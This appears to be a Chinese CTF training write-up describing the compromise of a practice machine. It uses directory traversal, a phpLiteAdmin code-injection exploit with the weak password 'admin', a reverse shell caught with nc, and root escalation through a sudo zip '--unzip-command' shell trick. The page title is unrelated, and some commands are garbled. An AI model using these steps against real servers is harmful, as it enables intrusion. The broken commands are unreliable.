java中的接口是类吗
413
2022-10-22
[CTF初学-51CTO]9-目录遍历漏洞-writeup
原料:《CTF夺旗训练视频课程》--目录遍历漏洞训练目标:owasp-zap 的使用,漏洞利用。 针对漏洞: 目录遍历漏洞 phpliteadmin 漏洞利用 webshell 常规 利用 不恰当的权限配置进行 提权
1. 信息收集
说明存在文件遍历漏洞。
dirb :发现 /dbadmin 页面,为phpLiteadmin 的管理入口。
2. 发现版本漏洞并尝试进攻,得到web权限
使用# searchsploit phpLiteAdmin,确认当前版本存在漏洞; 下载漏洞利用说明,searchsploit -m php/webapps/24044.txt,按照”说明“的指导进行操作即可, 尝试admin 弱口令,发现 phpLiteAdmin 的密码为 admin; 按照 24044.txt 中的漏洞说明,在phpliteadmin创建一个数据库,名称为 hack.php(PHP结尾即可)。然后创建表,表的名称任意填,表中default value 填入代码(此代码即为php的内容,需要认真检查); 利用目录遍历漏洞,执行该 hack.php 即可,此时可以看到 phpinfo() 返回的信息。 上传反弹shell代码,写入到 default value 中 ,因此修改上述 代码
//此代码的含义是,从进攻机上拿到 webshell.php 文件,然后修改执行权限,随后运行该 webshell。
为了让目标机拿到 webshell ,首先在进攻机上开 /usr/share/webshells/php/php-reverse-shell.php webshell.pHp vi webshell.pHp // 修改 IP地址 为进攻机地址,port 默认 1234
python3 -m 81 ,开启server。 在进攻机监听端口 1234 nc -nlvp 1234 运行php反弹shell代码
提升权限
当前用户 web-data ;
查看 /etc/passwd 发现用户 zico cd /home/zico
发现疑似 zico 的密码,su - zico登录,验证。
查看 #sudo -l
利用 zip漏洞提权(使用tar也可以)
# touch /tmp/exploit # sudo zip /tmp/exploit.zip /tmp/exploit -T —unzip-command=”sh -c /bin/sh”
得到root权限
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~